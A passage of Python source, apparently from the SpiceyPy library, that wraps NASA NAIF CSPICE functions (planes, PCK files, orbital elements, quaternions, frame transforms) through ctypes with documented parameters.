dist = ctypes.c_double()
libspice.nplnpt_c(linpt, lindir, point, pnear, ctypes.byref(dist))
return stypes.cVectorToPython(pnear), dist.value
@spiceErrorCheck
def nvc2pl(normal, constant):
"""
Make a plane from a normal vector and a constant.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nvc2pl_c.html
:param normal: A normal vector defining a plane.
:type normal: 3-Element Array of floats
:param constant: A constant defining a plane.
:type constant: float
:return: plane
:rtype: spiceypy.utils.support_types.Plane
"""
plane = stypes.Plane()
normal = stypes.toDoubleVector(normal)
constant = ctypes.c_double(constant)
libspice.nvc2pl_c(normal, constant, ctypes.byref(plane))
return plane
@spiceErrorCheck
def nvp2pl(normal, point):
"""
Make a plane from a normal vector and a point.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/nvp2pl_c.html
:param normal: A normal vector defining a plane.
:type normal: 3-Element Array of floats
:param point: A point defining a plane.
:type point: 3-Element Array of floats
:return: plane
:rtype: spiceypy.utils.support_types.Plane
"""
normal = stypes.toDoubleVector(normal)
point = stypes.toDoubleVector(point)
plane = stypes.Plane()
libspice.nvp2pl_c(normal, point, ctypes.byref(plane))
return plane
################################################################################
# O
@spiceErrorCheck
def occult(target1, shape1, frame1, target2, shape2, frame2, abcorr, observer,
et):
"""
Determines the occultation condition (not occulted, partially,
etc.) of one target relative to another target as seen by
an observer at a given time.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/occult_c.html
:param target1: Name or ID of first target.
:type target1: str
:param shape1: Type of shape model used for first target.
:type shape1: str
:param frame1: Body-fixed, body-centered frame for first body.
:type frame1: str
:param target2: Name or ID of second target.
:type target2: str
:param shape2: Type of shape model used for second target.
:type shape2: str
:param frame2: Body-fixed, body-centered frame for second body.
:type frame2: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:param observer: Name or ID of the observer.
:type observer: str
:param et: Time of the observation (seconds past J2000).
:type et: float
:return: Occultation identification code.
:rtype: int
"""
target1 = stypes.stringToCharP(target1)
shape1 = stypes.stringToCharP(shape1)
frame1 = stypes.stringToCharP(frame1)
target2 = stypes.stringToCharP(target2)
shape2 = stypes.stringToCharP(shape2)
frame2 = stypes.stringToCharP(frame2)
abcorr = stypes.stringToCharP(abcorr)
observer = stypes.stringToCharP(observer)
et = ctypes.c_double(et)
occult_code = ctypes.c_int()
libspice.occult_c(target1, shape1, frame1, target2, shape2, frame2, abcorr,
observer, et, ctypes.byref(occult_code))
return occult_code.value
@spiceErrorCheck
def ordc(item, inset):
"""
The function returns the ordinal position of any given item in a
character set. If the item does not appear in the set, the function
returns -1.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ordc_c.html
:param item: An item to locate within a set.
:type item: str
:param inset: A set to search for a given item.
:type inset: SpiceCharCell
:return: the ordinal position of item within the set
:rtype: int
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.is_char()
assert isinstance(item, str)
item = stypes.stringToCharP(item)
return libspice.ordc_c(item, ctypes.byref(inset))
@spiceErrorCheck
def ordd(item, inset):
"""
The function returns the ordinal position of any given item in a
double precision set. If the item does not appear in the set, the
function returns -1.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ordd_c.html
:param item: An item to locate within a set.
:type item: float
:param inset: A set to search for a given item.
:type inset: SpiceDoubleCell
:return: the ordinal position of item within the set
:rtype: int
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.is_double()
item = ctypes.c_double(item)
return libspice.ordd_c(item, ctypes.byref(inset))
@spiceErrorCheck
def ordi(item, inset):
"""
The function returns the ordinal position of any given item in an
integer set. If the item does not appear in the set, the function
returns -1.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/ordi_c.html
:param item: An item to locate within a set.
:type item: int
:param inset: A set to search for a given item.
:type inset: SpiceIntCell
:return: the ordinal position of item within the set
:rtype: int
"""
assert isinstance(inset, stypes.SpiceCell)
assert inset.is_int()
assert isinstance(item, int)
item = ctypes.c_int(item)
return libspice.ordi_c(item, ctypes.byref(inset))
@spiceErrorCheck
def orderc(array, ndim=None):
"""
Determine the order of elements in an array of character strings.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/orderc_c.html
:param array: Input array.
:type array: Array of strings.
:param ndim: Optional Length of input array
:type ndim: int
:return: Order vector for array.
:rtype: array of ints
"""
if ndim is None:
ndim = ctypes.c_int(len(array))
else:
ndim = ctypes.c_int(ndim)
lenvals = ctypes.c_int(len(max(array, key=len)) + 1)
iorder = stypes.emptyIntVector(ndim)
array = stypes.listToCharArray(array, lenvals, ndim)
libspice.orderc_c(lenvals, array, ndim, iorder)
return stypes.cVectorToPython(iorder)
@spiceErrorCheck
def orderd(array, ndim=None):
"""
Determine the order of elements in a double precision array.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/orderd_c.html
:param array: Input array.
:type array: Array of floats
:param ndim: Optional Length of input array
:type ndim: int
:return: Order vector for array.
:rtype: array of ints
"""
if ndim is None:
ndim = ctypes.c_int(len(array))
else:
ndim = ctypes.c_int(ndim)
array = stypes.toDoubleVector(array)
iorder = stypes.emptyIntVector(ndim)
libspice.orderd_c(array, ndim, iorder)
return stypes.cVectorToPython(iorder)
@spiceErrorCheck
def orderi(array, ndim=None):
"""
Determine the order of elements in an integer array.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/orderi_c.html
:param array: Input array.
:type array: Array of ints
:param ndim: Optional Length of input array
:type ndim: int
:return: Order vector for array.
:rtype: array of ints
"""
if ndim is None:
ndim = ctypes.c_int(len(array))
else:
ndim = ctypes.c_int(ndim)
array = stypes.toIntVector(array)
iorder = stypes.emptyIntVector(ndim)
libspice.orderi_c(array, ndim, iorder)
return stypes.cVectorToPython(iorder)
@spiceErrorCheck
def oscelt(state, et, mu):
"""
Determine the set of osculating conic orbital elements that
corresponds to the state (position, velocity) of a body at
some epoch.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/oscelt_c.html
:param state: State of body at epoch of elements.
:type state: Float Array of 6 elements.
:param et: Epoch of elements.
:type et: float
:param mu: Gravitational parameter (GM) of primary body.
:type mu: float
:return: Equivalent conic elements
:rtype: Float Array of 8 elements.
"""
state = stypes.toDoubleVector(state)
et = ctypes.c_double(et)
mu = ctypes.c_double(mu)
elts = stypes.emptyDoubleVector(8)
libspice.oscelt_c(state, et, mu, elts)
return stypes.cVectorToPython(elts)
def oscltx(state, et, mu):
"""
Determine the set of osculating conic orbital elements that
corresponds to the state (position, velocity) of a body at some
epoch. In additional to the classical elements, return the true
anomaly, semi-major axis, and period, if applicable.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/oscltx_c.html
:param state: State of body at epoch of elements.
:type state: 6-Element Array of floats
:param et: Epoch of elements.
:type et: float
:param mu: Gravitational parameter (GM) of primary body.
:type mu: float
:return: Extended set of classical conic elements.
"""
state = stypes.toDoubleVector(state)
et = ctypes.c_double(et)
mu = ctypes.c_double(mu)
elts = stypes.emptyDoubleVector(20)
libspice.oscltx_c(state, et, mu, elts)
return stypes.cVectorToPython(elts)[0:11]
################################################################################
# P
@spiceErrorCheck
def pckcls(handle):
"""
Close an open PCK file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckcls_c.html
:param handle: Handle of the PCK file to be closed.
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.pckcls_c(handle)
@spiceErrorCheck
def pckcov(pck, idcode, cover):
"""
Find the coverage window for a specified reference frame in a
specified binary PCK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckcov_c.html
:param pck: Name of PCK file.
:type pck: str
:param idcode: Class ID code of PCK reference frame.
:type idcode: int
:param cover: Window giving coverage in pck for idcode.
:type cover: SpiceCell
"""
pck = stypes.stringToCharP(pck)
idcode = ctypes.c_int(idcode)
assert isinstance(cover, stypes.SpiceCell)
assert cover.dtype == 1
libspice.pckcov_c(pck, idcode, ctypes.byref(cover))
@spiceErrorCheck
def pckfrm(pck, ids):
"""
Find the set of reference frame class ID codes of all frames
in a specified binary PCK file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckfrm_c.html
:param pck: Name of PCK file.
:type pck: str
:param ids: Set of frame class ID codes of frames in PCK file.
:type ids: SpiceCell
"""
pck = stypes.stringToCharP(pck)
assert isinstance(ids, stypes.SpiceCell)
assert ids.dtype == 2
libspice.pckfrm_c(pck, ctypes.byref(ids))
@spiceErrorCheck
def pcklof(filename):
"""
Load a binary PCK file for use by the readers. Return the
handle of the loaded file which is used by other PCK routines to
refer to the file.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pcklof_c.html
:param filename: Name of the file to be loaded.
:type filename: str
:return: Loaded file's handle.
:rtype: int
"""
filename = stypes.stringToCharP(filename)
handle = ctypes.c_int()
libspice.pcklof_c(filename, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def pckopn(name, ifname, ncomch):
"""
Create a new PCK file, returning the handle of the opened file.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckopn_c.html
:param name: The name of the PCK file to be opened.
:type name: str
:param ifname: The internal filename for the PCK.
:type ifname: str
:param ncomch: The number of characters to reserve for comments.
:type ncomch: int
:return: The handle of the opened PCK file.
:rtype: int
"""
name = stypes.stringToCharP(name)
ifname = stypes.stringToCharP(ifname)
ncomch = ctypes.c_int(ncomch)
handle = ctypes.c_int()
libspice.pckopn_c(name, ifname, ncomch, ctypes.byref(handle))
return handle.value
@spiceErrorCheck
def pckuof(handle):
"""
Unload a binary PCK file so that it will no longer be searched by
the readers.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckuof_c.html
:param handle: Handle of PCK file to be unloaded
:type handle: int
"""
handle = ctypes.c_int(handle)
libspice.pckuof_c(handle)
@spiceErrorCheck
def pckw02(handle, classid, frname, first, last, segid, intlen, n, polydg, cdata, btime):
"""
Write a type 2 segment to a PCK binary file given the file handle,
frame class ID, base frame, time range covered by the segment, and
the Chebyshev polynomial coefficients.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pckw02_c.html
:param handle: Handle of binary PCK file open for writing.
:type handle: int
:param classid: Frame class ID of body-fixed frame.
:type classid: int
:param frname: Name of base reference frame.
:type frname: str
:param first: Start time of interval covered by segment.
:type first: float
:param last: End time of interval covered by segment.
:type last: float
:param segid: Segment identifier.
:type segid: str
:param intlen: Length of time covered by logical record.
:type intlen: float
:param n: Number of logical records in segment.
:type n: int
:param polydg: Chebyshev polynomial degree.
:type polydg: int
:param cdata: Array of Chebyshev coefficients.
:type cdata: N-Element Array of floats
:param btime: Begin time of first logical record.
:type btime: float
"""
handle = ctypes.c_int(handle)
classid = ctypes.c_int(classid)
frame = stypes.stringToCharP(frname)
first = ctypes.c_double(first)
last = ctypes.c_double(last)
segid = stypes.stringToCharP(segid)
intlen = ctypes.c_double(intlen)
n = ctypes.c_int(n)
polydg = ctypes.c_int(polydg)
cdata = stypes.toDoubleVector(cdata)
btime = ctypes.c_double(btime)
libspice.pckw02_c(handle, classid, frame, first, last, segid, intlen, n, polydg, cdata, btime)
@spiceErrorCheck
def pcpool(name, cvals):
"""
This entry point provides toolkit programmers a method for
programmatically inserting character data into the
kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pcpool_c.html
:param name: The kernel pool name to associate with cvals.
:type name: str
:param cvals: An array of strings to insert into the kernel pool.
:type cvals: Array of str
"""
name = stypes.stringToCharP(name)
lenvals = ctypes.c_int(len(max(cvals, key=len)) + 1)
n = ctypes.c_int(len(cvals))
cvals = stypes.listToCharArray(cvals, lenvals, n)
libspice.pcpool_c(name, n, lenvals, cvals)
@spiceErrorCheck
def pdpool(name, dvals):
"""
This entry point provides toolkit programmers a method for
programmatically inserting double precision data into the
kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pdpool_c.html
:param name: The kernel pool name to associate with dvals.
:type name: str
:param dvals: An array of values to insert into the kernel pool.
:type dvals: SpiceCell
"""
name = stypes.stringToCharP(name)
n = ctypes.c_int(len(dvals))
dvals = stypes.toDoubleVector(dvals)
libspice.pdpool_c(name, n, dvals)
@spiceErrorCheck
def pgrrec(body, lon, lat, alt, re, f):
"""
Convert planetographic coordinates to rectangular coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pgrrec_c.html
:param body: Body with which coordinate system is associated.
:type body: str
:param lon: Planetographic longitude of a point (radians).
:type lon: float
:param lat: Planetographic latitude of a point (radians).
:type lat: float
:param alt: Altitude of a point above reference spheroid.
:type alt: float
:param re: Equatorial radius of the reference spheroid.
:type re: float
:param f: Flattening coefficient.
:type f: float
:return: Rectangular coordinates of the point.
:rtype: 3-Element Array of floats
"""
body = stypes.stringToCharP(body)
lon = ctypes.c_double(lon)
lat = ctypes.c_double(lat)
alt = ctypes.c_double(alt)
re = ctypes.c_double(re)
f = ctypes.c_double(f)
rectan = stypes.emptyDoubleVector(3)
libspice.pgrrec_c(body, lon, lat, alt, re, f, rectan)
return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def phaseq(et, target, illmn, obsrvr, abcorr):
"""
Compute the apparent phase angle for a target, observer,
illuminator set of ephemeris objects.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/phaseq_c.html
:param et: Ephemeris seconds past J2000 TDB.
:type et: float
:param target: Target body name.
:type target: str
:param illmn: Illuminating body name.
:type illmn: str
:param obsrvr: Observer body.
:type obsrvr: str
:param abcorr: Aberration correction flag.
:type abcorr: str
:return: Value of phase angle.
:rtype: float
"""
et = ctypes.c_double(et)
target = stypes.stringToCharP(target)
illmn = stypes.stringToCharP(illmn)
obsrvr = stypes.stringToCharP(obsrvr)
abcorr = stypes.stringToCharP(abcorr)
return libspice.phaseq_c(et, target, illmn, obsrvr, abcorr)
@spiceErrorCheck
def pi():
"""
Return the value of pi (the ratio of the circumference of
a circle to its diameter).
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pi_c.html
:return: value of pi.
:rtype: float
"""
return libspice.pi_c()
@spiceErrorCheck
def pipool(name, ivals):
"""
This entry point provides toolkit programmers a method for
programmatically inserting integer data into the kernel pool.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pipool_c.html
:param name: The kernel pool name to associate with values.
:type name: str
:param ivals: An array of integers to insert into the pool.
:type ivals: Array of ints
"""
name = stypes.stringToCharP(name)
n = ctypes.c_int(len(ivals))
ivals = stypes.toIntVector(ivals)
libspice.pipool_c(name, n, ivals)
@spiceErrorCheck
def pjelpl(elin, plane):
"""
Project an ellipse onto a plane, orthogonally.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pjelpl_c.html
:param elin: A SPICE ellipse to be projected.
:type elin: spiceypy.utils.support_types.Ellipse
:param plane: A plane onto which elin is to be projected.
:type plane: supporttypes.Plane
:return: A SPICE ellipse resulting from the projection.
:rtype: spiceypy.utils.support_types.Ellipse
"""
assert (isinstance(elin, stypes.Ellipse))
assert (isinstance(plane, stypes.Plane))
elout = stypes.Ellipse()
libspice.pjelpl_c(ctypes.byref(elin), ctypes.byref(plane),
ctypes.byref(elout))
return elout
@spiceErrorCheck
def pl2nvc(plane):
"""
Return a unit normal vector and constant that define a specified plane.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pl2nvc_c.html
:param plane: A SPICE plane.
:type plane: supporttypes.Plane
:return:
A normal vector and constant defining
the geometric plane represented by plane.
:rtype: tuple
"""
assert (isinstance(plane, stypes.Plane))
normal = stypes.emptyDoubleVector(3)
constant = ctypes.c_double()
libspice.pl2nvc_c(ctypes.byref(plane), normal, ctypes.byref(constant))
return stypes.cVectorToPython(normal), constant.value
@spiceErrorCheck
def pl2nvp(plane):
"""
Return a unit normal vector and point that define a specified plane.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pl2nvp_c.html
:param plane: A SPICE plane.
:type plane: supporttypes.Plane
:return: A unit normal vector and point that define plane.
:rtype: tuple
"""
assert (isinstance(plane, stypes.Plane))
normal = stypes.emptyDoubleVector(3)
point = stypes.emptyDoubleVector(3)
libspice.pl2nvp_c(ctypes.byref(plane), normal, point)
return stypes.cVectorToPython(normal), stypes.cVectorToPython(point)
@spiceErrorCheck
def pl2psv(plane):
"""
Return a point and two orthogonal spanning vectors that generate
a specified plane.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pl2psv_c.html
:param plane: A SPICE plane.
:type plane: supporttypes.Plane
:return:
A point in the input plane and two vectors
spanning the input plane.
:rtype: tuple
"""
assert (isinstance(plane, stypes.Plane))
point = stypes.emptyDoubleVector(3)
span1 = stypes.emptyDoubleVector(3)
span2 = stypes.emptyDoubleVector(3)
libspice.pl2psv_c(ctypes.byref(plane), point, span1, span2)
return stypes.cVectorToPython(point), stypes.cVectorToPython(
span1), stypes.cVectorToPython(span2)
@spiceErrorCheck
def pltar(vrtces, plates):
"""
Compute the total area of a collection of triangular plates.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltar_c.html
:param vrtces: Array of vertices.
:type vrtces: Nx3-Element Array of floats
:param plates: Array of plates.
:type plates: Nx3-Element Array of ints
:return: total area of the set of plates
:rtype: float
"""
nv = ctypes.c_int(len(vrtces))
vrtces = stypes.toDoubleMatrix(vrtces)
np = ctypes.c_int(len(plates))
plates = stypes.toIntMatrix(plates)
return libspice.pltar_c(nv, vrtces, np, plates)
@spiceErrorCheck
def pltexp(iverts, delta):
"""
Expand a triangular plate by a specified amount. The expanded
plate is co-planar with, and has the same orientation as, the
original. The centroids of the two plates coincide.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltexp_c.html
:param iverts: Vertices of the plate to be expanded.
:type iverts: 3x3-Element Array of floats
:param delta: Fraction by which the plate is to be expanded.
:type delta: double
:return: Vertices of the expanded plate.
:rtype: 3x3-Element Array of floats
"""
iverts = stypes.toDoubleMatrix(iverts)
delta = ctypes.c_double(delta)
overts = stypes.emptyDoubleMatrix()
libspice.pltexp_c(iverts, delta, overts)
return stypes.cMatrixToNumpy(overts)
@spiceErrorCheck
def pltnp(point, v1, v2, v3):
"""
Find the nearest point on a triangular plate to a given point.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltnp_c.html
:param point: A point in 3-dimensional space.
:type point: 3-Element Array of floats
:param v1: Vertices of a triangular plate.
:type v1: 3-Element Array of floats
:param v2: Vertices of a triangular plate.
:type v2: 3-Element Array of floats
:param v3: Vertices of a triangular plate.
:type v3: 3-Element Array of floats
:return: the nearest point on a triangular plate to a given point and distance
:rtype: tuple
"""
point = stypes.toDoubleVector(point)
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
v3 = stypes.toDoubleVector(v3)
pnear = stypes.emptyDoubleVector(3)
dist = ctypes.c_double()
libspice.pltnp_c(point, v1, v2, v3, pnear, ctypes.byref(dist))
return stypes.cVectorToPython(pnear), dist.value
@spiceErrorCheck
def pltnrm(v1, v2, v3):
"""
Compute an outward normal vector of a triangular plate.
The vector does not necessarily have unit length.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltnrm_c.html
:param v1: Vertices of a plate.
:type v1: 3-Element Array of floats
:param v2: Vertices of a plate.
:type v2: 3-Element Array of floats
:param v3: Vertices of a plate.
:type v3: 3-Element Array of floats
:return: Plate's outward normal vector.
:rtype: 3-Element Array of floats
"""
v1 = stypes.toDoubleVector(v1)
v2 = stypes.toDoubleVector(v2)
v3 = stypes.toDoubleVector(v3)
normal = stypes.emptyDoubleVector(3)
libspice.pltnrm_c(v1, v2, v3, normal)
return stypes.cVectorToPython(normal)
@spiceErrorCheck
def pltvol(vrtces, plates):
"""
Compute the volume of a three-dimensional region bounded by a
collection of triangular plates.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pltvol_c.html
:param vrtces: Array of vertices.
:type vrtces: Nx3-Element Array of floats
:param plates: Array of plates.
:type plates: Nx3-Element Array of ints
:return: the volume of the spatial region bounded by the plates.
:rtype: float
"""
nv = ctypes.c_int(len(vrtces))
vrtces = stypes.toDoubleMatrix(vrtces)
np = ctypes.c_int(len(plates))
plates = stypes.toIntMatrix(plates)
return libspice.pltvol_c(nv, vrtces, np, plates)
@spiceErrorCheck
def polyds(coeffs, deg, nderiv, t):
"""
Compute the value of a polynomial and it's first
n derivatives at the value t.
https://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/polyds_c.html
:param coeffs: Coefficients of the polynomial to be evaluated.
:type coeffs: N-Element Array of floats
:param deg: Degree of the polynomial to be evaluated.
:type deg: int
:param nderiv: Number of derivatives to compute.
:type nderiv: int
:param t: Point to evaluate the polynomial and derivatives
:type t: float
:return: Value of polynomial and derivatives.
:rtype: nderiv-Element Array of floats
"""
coeffs = stypes.toDoubleVector(coeffs)
deg = ctypes.c_int(deg)
p = stypes.emptyDoubleVector(nderiv + 1)
nderiv = ctypes.c_int(nderiv)
t = ctypes.c_double(t)
libspice.polyds_c(ctypes.byref(coeffs), deg, nderiv, t, p)
return stypes.cVectorToPython(p)
@spiceErrorCheck
def pos(string, substr, start):
"""
Find the first occurrence in a string of a substring, starting at
a specified location, searching forward.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pos_c.html
:param string: Any character string.
:type string: str
:param substr: Substring to locate in the character string.
:type substr: str
:param start: Position to begin looking for substr in string.
:type start: int
:return:
The index of the first occurrence of substr
in string at or following index start.
:rtype: int
"""
string = stypes.stringToCharP(string)
substr = stypes.stringToCharP(substr)
start = ctypes.c_int(start)
return libspice.pos_c(string, substr, start)
@spiceErrorCheck
def posr(string, substr, start):
"""
Find the first occurrence in a string of a substring, starting at
a specified location, searching backward.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/posr_c.html
:param string: Any character string.
:type string: str
:param substr: Substring to locate in the character string.
:type substr: str
:param start: Position to begin looking for substr in string.
:type start: int
:return:
The index of the last occurrence of substr
in string at or preceding index start.
:rtype: int
"""
string = stypes.stringToCharP(string)
substr = stypes.stringToCharP(substr)
start = ctypes.c_int(start)
return libspice.posr_c(string, substr, start)
# prompt,
# skip for no as this is not really an important function for python users
@spiceErrorCheck
def prop2b(gm, pvinit, dt):
"""
Given a central mass and the state of massless body at time t_0,
this routine determines the state as predicted by a two-body
force model at time t_0 + dt.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/prop2b_c.html
:param gm: Gravity of the central mass.
:type gm: float
:param pvinit: Initial state from which to propagate a state.
:type pvinit: 6-Element Array of floats
:param dt: Time offset from initial state to propagate to.
:type dt: float
:return: The propagated state.
:rtype: 6-Element Array of floats
"""
gm = ctypes.c_double(gm)
pvinit = stypes.toDoubleVector(pvinit)
dt = ctypes.c_double(dt)
pvprop = stypes.emptyDoubleVector(6)
libspice.prop2b_c(gm, pvinit, dt, pvprop)
return stypes.cVectorToPython(pvprop)
@spiceErrorCheck
def prsdp(string):
"""
Parse a string as a double precision number, encapsulating error handling.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/prsdp_c.html
:param string: String representing a d.p. number.
:type string: str
:return: D.p. value obtained by parsing string.
:rtype: float
"""
string = stypes.stringToCharP(string)
dpval = ctypes.c_double()
libspice.prsdp_c(string, ctypes.byref(dpval))
return dpval.value
@spiceErrorCheck
def prsint(string):
"""
Parse a string as an integer, encapsulating error handling.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/prsint_c.html
:param string: String representing an integer.
:type string: str
:return: Integer value obtained by parsing string.
:rtype: int
"""
string = stypes.stringToCharP(string)
intval = ctypes.c_int()
libspice.prsint_c(string, ctypes.byref(intval))
return intval.value
@spiceErrorCheck
def psv2pl(point, span1, span2):
"""
Make a CSPICE plane from a point and two spanning vectors.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/psv2pl_c.html
:param point: A Point.
:type point: 3-Element Array of floats
:param span1: First Spanning vector.
:type span1: 3-Element Array of floats
:param span2: Second Spanning vector.
:type span2: 3-Element Array of floats
:return: A SPICE plane.
:rtype: supportypes.Plane
"""
point = stypes.toDoubleVector(point)
span1 = stypes.toDoubleVector(span1)
span2 = stypes.toDoubleVector(span2)
plane = stypes.Plane()
libspice.psv2pl_c(point, span1, span2, ctypes.byref(plane))
return plane
# skip putcml, is this really needed for python users?
@spiceErrorCheck
def pxform(fromstr, tostr, et):
"""
Return the matrix that transforms position vectors from one
specified frame to another at a specified epoch.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pxform_c.html
:param fromstr: Name of the frame to transform from.
:type fromstr: str
:param tostr: Name of the frame to transform to.
:type tostr: str
:param et: Epoch of the rotation matrix.
:type et: float
:return: A rotation matrix.
:rtype: 3x3 Element Array of floats
"""
et = ctypes.c_double(et)
tostr = stypes.stringToCharP(tostr)
fromstr = stypes.stringToCharP(fromstr)
rotatematrix = stypes.emptyDoubleMatrix()
libspice.pxform_c(fromstr, tostr, et, rotatematrix)
return stypes.cMatrixToNumpy(rotatematrix)
@spiceErrorCheck
def pxfrm2(frame_from, frame_to, etfrom, etto):
"""
Return the 3x3 matrix that transforms position vectors from one
specified frame at a specified epoch to another specified
frame at another specified epoch.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/pxfrm2_c.html
:param frame_from: Name of the frame to transform from.
:type frame_from: str
:param frame_to: Name of the frame to transform to.
:type frame_to: str
:param etfrom: Evaluation time of frame_from.
:type etfrom: float
:param etto: Evaluation time of frame_to.
:type etto: float
:return: A position transformation matrix from frame_from to frame_to
:rtype: 3x3 Element Array of floats
"""
frame_from = stypes.stringToCharP(frame_from)
frame_to = stypes.stringToCharP(frame_to)
etfrom = ctypes.c_double(etfrom)
etto = ctypes.c_double(etto)
outmatrix = stypes.emptyDoubleMatrix()
libspice.pxfrm2_c(frame_from, frame_to, etfrom, etto, outmatrix)
return stypes.cMatrixToNumpy(outmatrix)
################################################################################
# Q
@spiceErrorCheck
def q2m(q):
"""
Find the rotation matrix corresponding to a specified unit quaternion.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/q2m_c.html
:param q: A unit quaternion.
:type q: 4-Element Array of floats
:return: A rotation matrix corresponding to q
:rtype: 3x3-Element Array of floats
"""
q = stypes.toDoubleVector(q)
mout = stypes.emptyDoubleMatrix()
libspice.q2m_c(q, mout)
return stypes.cMatrixToNumpy(mout)
# @spiceErrorCheck
def qcktrc(tracelen=_default_len_out):
"""
Return a string containing a traceback.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/qcktrc_c.html
:param tracelen: Maximum length of output traceback string.
:type tracelen: int
:return: A traceback string.
:rtype: str
"""
tracestr = stypes.stringToCharP(tracelen)
tracelen = ctypes.c_int(tracelen)
libspice.qcktrc_c(tracelen, tracestr)
return stypes.toPythonString(tracestr)
@spiceErrorCheck
def qdq2av(q, dq):
"""
Derive angular velocity from a unit quaternion and its derivative
with respect to time.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/qdq2av_c.html
:param q: Unit SPICE quaternion.
:type q: 4-Element Array of floats
:param dq: Derivative of q with respect to time
:type dq: 4-Element Array of floats
:return: Angular velocity defined by q and dq.
:rtype: 3-Element Array of floats
"""
q = stypes.toDoubleVector(q)
dq = stypes.toDoubleVector(dq)
vout = stypes.emptyDoubleVector(3)
libspice.qdq2av_c(q, dq, vout)
return stypes.cVectorToPython(vout)
@spiceErrorCheck
def qxq(q1, q2):
"""
Multiply two quaternions.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/qxq_c.html
:param q1: First SPICE quaternion.
:type q1: 4-Element Array of floats
:param q2: Second SPICE quaternion.
:type q2: 4-Element Array of floats
:return: Product of q1 and q2.
:rtype: 4-Element Array of floats
"""
q1 = stypes.toDoubleVector(q1)
q2 = stypes.toDoubleVector(q2)
vout = stypes.emptyDoubleVector(4)
libspice.qxq_c(q1, q2, vout)
return stypes.cVectorToPython(vout)
################################################################################
# R
@spiceErrorCheck
def radrec(inrange, re, dec):
"""
Convert from range, right ascension, and declination to rectangular
coordinates.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/radrec_c.html
:param inrange: Distance of a point from the origin.
:type inrange: float
:param re: Right ascension of point in radians.
:type re: float
:param dec: Declination of point in radians.
:type dec: float
:return: Rectangular coordinates of the point.
:rtype: 3-Element Array of floats
"""
inrange = ctypes.c_double(inrange)
re = ctypes.c_double(re)
dec = ctypes.c_double(dec)
rectan = stypes.emptyDoubleVector(3)
libspice.radrec_c(inrange, re, dec, rectan)
return stypes.cVectorToPython(rectan)
@spiceErrorCheck
def rav2xf(rot, av):
"""
This routine determines a state transformation matrix
from a rotation matrix and the angular velocity of the
rotation.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/rav2xf_c.html
:param rot: Rotation matrix.
:type rot: 3x3-Element Array of floats
:param av: Angular velocity vector.
:type av: 3-Element Array of floats
:return: State transformation associated with rot and av.
:rtype: 6x6-Element Array of floats
"""
rot = stypes.toDoubleMatrix(rot)
av = stypes.toDoubleVector(av)
xform = stypes.emptyDoubleMatrix(x=6, y=6)
libspice.rav2xf_c(rot, av, xform)
return stypes.cMatrixToNumpy(xform)
@spiceErrorCheck
def raxisa(matrix):
"""
Compute the axis of the rotation given by an input matrix
and the angle of the rotation about that axis.
http://naif.jpl.nasa.gov/pub/naif/toolkit_docs/C/cspice/raxisa_c.html
